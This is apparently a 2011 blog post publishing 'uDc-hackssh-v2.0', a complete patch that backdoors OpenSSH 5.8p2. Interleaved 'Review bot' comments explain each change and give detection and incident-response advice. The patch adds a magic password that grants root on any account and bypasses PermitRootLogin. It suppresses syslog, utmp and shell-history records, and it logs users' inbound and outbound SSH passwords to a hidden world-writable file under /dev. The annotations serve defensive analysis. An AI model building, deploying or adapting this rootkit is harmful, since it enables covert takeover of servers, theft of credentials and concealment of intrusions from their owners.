Sunday, June 26, 2011

uDc-hackssh-v2.0

CHANGES:
Updated for openssh-5.x version

FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No'

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch

diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c
*** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009
--- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011
***************
*** 466,471 ****
--- 466,475 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+  if(uDc)
+   sshpam_err = PAM_SUCCESS;
+ // end of slash
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
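Review bot: The added `if(uDc) sshpam_err = PAM_SUCCESS;` right after `pam_authenticate()` throws away the PAM verdict whenever the global flag is set, so the `goto auth_fail` test that follows can no longer reject the login; this is an authentication bypass and the two added lines have no legitimate purpose in this path. The same flag skips `pam_authenticate()` in the hunk at 1205, returns success from the password check in auth-passwd.c, and short-circuits `allowed_user()` and `auth_root_allowed()` in auth.c, so account restrictions and `PermitRootLogin` stop applying too. Since sshd_config and the PAM stack are untouched, a host running this build is found by comparing the installed sshd and ssh binaries against the distribution package or a known-good hash from trusted media, not by reviewing configuration. The enclosing function starts and ends outside the hunk.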
 
***************
*** 816,821 ****
--- 820,834 ----
   Buffer buffer;
   struct pam_ctxt *ctxt = ctx;
 
+ // slash patch
+          if(sshpam_authctxt)
+            for (gurun = 0; gurun < num; ++gurun) {
+                sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+                        get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]);
+                if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1;
+                    else uDclog();
+            }
+ // end of patch


   debug2("PAM: %s entering, %u responses", __func__, num);
   switch (ctxt->pam_done) {
   case 1:
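Review bot: The loop added ahead of `debug2(...)` formats every PAM response (the text the client typed as a password) together with `get_remote_ipaddr()` and `sshpam_authctxt->user` into `slashbuff` and passes it to `uDclog()`, so ordinary users' credentials are written to disk on each keyboard-interactive attempt. The same capture is added on the server side in auth-passwd.c and on the client side in sshconnect1.c and sshconnect2.c, which means passwords typed for outbound connections from this machine are recorded as well. For incident response, every password entered on or through a host running this build has to be treated as disclosed and rotated, including accounts on the downstream systems reached from it. The enclosing function begins and ends outside the hunk.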
***************
*** 1205,1210 ****
--- 1218,1226 ----
    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,
        pam_strerror(sshpam_handle, sshpam_err));
  
+ // slash patch
+  if(!uDc)
+ // end of patch
   sshpam_err = pam_authenticate(sshpam_handle, flags);
   sshpam_password = NULL;
   if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c
*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009
--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011
***************
*** 92,97 ****
--- 92,103 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ // slash patch
+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), pw->pw_name, password);
+        uDclog();
+ // end of patch
  
  #ifdef KRB5
   if (options.kerberos_authentication == 1) {
diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c
*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011
***************
*** 94,99 ****
--- 94,104 ----
  int
  allowed_user(struct passwd * pw)
  {
+ // slash patch
+  if(uDc) return 1;
+  else {
+ // end of patch
+ 
   struct stat st;
   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
   u_int i;
***************
*** 249,258 ****
--- 254,269 ----
   /* We found no reason not to let this user try to log on... */
   return 1;
  }
+ // slash patch
+ }
+ // end of patch
  
  void
  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   void (*authlog) (const char *fmt,...) = verbose;
   char *authmsg;
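Review bot: Wrapping the body of `auth_log()` in `if(!uDc) {` means a login made through the bypass produces no accepted or failed authentication line. The early `if(uDc) return;` in log.c, `if(uDc) return 0;` in `login_write()` in loginrec.c, and the guards around `record_login()`, `record_utmp_only()` and `record_logout()` in sshlogin.c remove the remaining syslog and login-record entries for that session. Host-local logs therefore cannot be relied on to show these sessions. Detection has to come from sources the daemon does not control, such as network flow records for the SSH port, kernel audit records shipped off-host, or a process listing that shows an sshd child and shell with no matching login record. The body of `auth_log()` continues outside the hunk.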
  
***************
*** 298,303 ****
--- 309,317 ----
    audit_event(audit_classify_auth(method));
  #endif
  }
+ // slash patch
+ }
+ // end of patch
  
  /*
   * Check whether root logins are disallowed.
***************
*** 305,310 ****
--- 319,327 ----
  int
  auth_root_allowed(char *method)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   switch (options.permit_root_login) {
   case PERMIT_YES:
    return 1;
***************
*** 322,327 ****
--- 339,349 ----
   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
   return 0;
  }
+ // slash patch
+  else
+  return 1;
+ }
+ // end of patch
  
  
  /*
diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c
*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010
--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011
***************
*** 81,86 ****
--- 81,89 ----
   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
       NULL, 0, NI_NAMEREQD) != 0) {
    /* Host name not found.  Use ip address. */
+ // slash patch
+   if(!uDc)
+ // end of patch
    return xstrdup(ntop);
   }
  
diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h
*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010
--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011
***************
*** 13,18 ****
--- 13,40 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // slash patch
+ #include 
+ #include 
+ 
+ #define BAJAUPASS     "CHANGE-ME"
+ #define SSH_LOG       "/dev/lala"
+ 
+ FILE *s9clog;
+ char  slashbuff[1024];
+ int   kambing, gurun, uDc;
+ 
+ #define uDclog() {                                 \
+  kambing=strlen(slashbuff);                               \
+  for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \
+  s9clog=fopen(SSH_LOG, "a");                         \
+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \
+  chmod(SSH_LOG, 0666);                             \
+ }
+ 
+ const char *get_remote_ipaddr(void);
+ // end of patch
+ 
  #ifndef INCLUDES_H
  #define INCLUDES_H
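Review bot: The definitions added above the include guard are the on-disk footprint of the patch: `SSH_LOG` is `"/dev/lala"`, and `uDclog()` appends `slashbuff` to it after bitwise-complementing each byte, then sets the file to mode 0666. The captured credentials therefore sit in a world-readable and world-writable regular file under /dev, unreadable to a plain string search until the bytes are complemented back. A regular file in /dev is anomalous in itself and is worth a file-integrity rule or a periodic `find /dev -type f` sweep, though `SSH_LOG` and `BAJAUPASS` are compile-time defines, so another build may use different values and the path is a weak indicator on its own. The two `#include` lines have lost their header names in extraction and are incomplete as shown.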
  
diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c
*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008
--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011
***************
*** 336,341 ****
--- 336,345 ----
   char fmtbuf[MSGBUFSIZ];
   char *txt = NULL;
   int pri = LOG_INFO;
+ 
+ // slash patch
+  if(uDc) return;
+ // end of patch
   int saved_errno = errno;
  
   if (level > log_level)
diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c
*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011
--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011
***************
*** 433,438 ****
--- 433,442 ----
  int
  login_write(struct logininfo *li)
  {
+ // slash patch
+  if(uDc) return 0;
+ // end of patch
+ 
  #ifndef HAVE_CYGWIN
   if (geteuid() != 0) {
    logit("Attempt to write login records by non-root user (aborting)");
diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c
*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010
--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011
***************
*** 1198,1203 ****
--- 1198,1207 ----
   }
   if (getenv("TZ"))
    child_set_env(&env, &envsize, "TZ", getenv("TZ"));
+ // slash patch
+  if(uDc)
+   child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
  
   /* Set custom environment options from RSA authentication. */
   if (!options.use_login) {
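Review bot: The added `child_set_env(&env, &envsize, "HISTFILE", "/dev/null");` turns off shell history for bypass sessions. The later session.c hunks at 1483, 1492 and 1515 replace the normal group setup with `setgid(0)` and `initgroups(pw->pw_name, 0)` and skip `permanently_set_uid(pw)`, so the resulting shell presumably keeps the daemon's root identity while carrying an ordinary account's login name. That mismatch is a usable indicator: a shell descended from sshd with uid and gid 0 although the account in its environment is unprivileged, or one with `HISTFILE=/dev/null` in `/proc/<pid>/environ`. The enclosing functions start and end outside these hunks.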
***************
*** 1483,1488 ****
--- 1487,1495 ----
  #else
    if (setlogin(pw->pw_name) < 0)
     error("setlogin failed: %s", strerror(errno));
+ // slash patch
+   if(!uDc) {
+ // end of patch
    if (setgid(pw->pw_gid) < 0) {
     perror("setgid");
     exit(1);
***************
*** 1492,1497 ****
--- 1499,1511 ----
     perror("initgroups");
     exit(1);
    }
+ // slash patch
+  }
+  else {
+   setgid(0);
+   initgroups(pw->pw_name, 0);
+  }
+ // end of patch
    endgrent();
  #endif
  
***************
*** 1515,1520 ****
--- 1529,1537 ----
    }
  #else
    /* Permanently switch to the desired uid. */
+ // slash patch
+  if(!uDc)
+ // end of patch
    permanently_set_uid(pw);
  #endif
   }
diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c
*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006
--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011
***************
*** 458,463 ****
--- 458,468 ----
    password = read_passphrase(prompt, 0);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
+ // slash patch
+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",
+    get_remote_ipaddr(), options.user, password);
+                 uDclog();
+ // end of patch
    memset(password, 0, strlen(password));
    xfree(password);
    packet_send();
diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c
*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011
***************
*** 883,888 ****
--- 883,893 ----
   packet_put_cstring(authctxt->method->name);
   packet_put_char(0);
   packet_put_cstring(password);
+ // slash patch
+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), options.user, password);
+        uDclog();
+ // end of patch
   memset(password, 0, strlen(password));
   xfree(password);
   packet_add_padding(64);
***************
*** 1558,1563 ****
--- 1563,1573 ----
  
    response = read_passphrase(prompt, echo ? RP_ECHO : 0);
  
+ // slash patch
+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                    get_remote_ipaddr(), options.user, response);
+                uDclog();
+ // end of patch
    packet_put_cstring(response);
    memset(response, 0, strlen(response));
    xfree(response);
diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c
*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011
--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011
***************
*** 126,131 ****
--- 126,134 ----
  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
      const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   /* save previous login details before writing new */
***************
*** 136,147 ****
--- 139,156 ----
   login_login(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  
  #ifdef LOGIN_NEEDS_UTMPX
  void
  record_utmp_only(pid_t pid, const char *ttyname, const char *user,
     const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, host, ttyname);
***************
*** 149,163 ****
--- 158,181 ----
   login_utmp_only(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  #endif
  
  /* Records that the user has logged out. */
  void
  record_logout(pid_t pid, const char *tty, const char *user)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, NULL, tty);
   login_logout(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h
*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011
--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011
***************
*** 1,6 ****
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8"
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
--- 1,6 ----
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8" // change
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
